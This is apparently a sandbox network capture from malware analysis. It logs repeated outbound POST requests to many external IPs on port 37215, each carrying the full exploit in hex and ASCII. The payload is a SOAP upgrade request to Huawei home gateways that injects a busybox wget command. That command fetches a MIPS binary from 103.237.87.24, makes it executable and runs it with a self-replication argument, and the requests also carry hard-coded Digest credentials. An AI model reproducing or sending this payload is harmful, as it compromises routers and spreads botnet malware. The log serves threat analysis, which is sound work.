                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1142192.168.2.1348390157.174.53.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441448927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1143192.168.2.134293241.141.103.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441920996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1144192.168.2.1342808197.38.110.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441936016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1145192.168.2.1351870157.74.193.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.441998959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1146192.168.2.1359542198.116.172.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.442867041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1147192.168.2.135022095.235.95.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443562031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1148192.168.2.135676841.6.158.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443567991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1149192.168.2.1357642157.4.76.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443619967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1150192.168.2.1353338197.210.212.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443646908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1151192.168.2.135164014.145.235.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443658113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 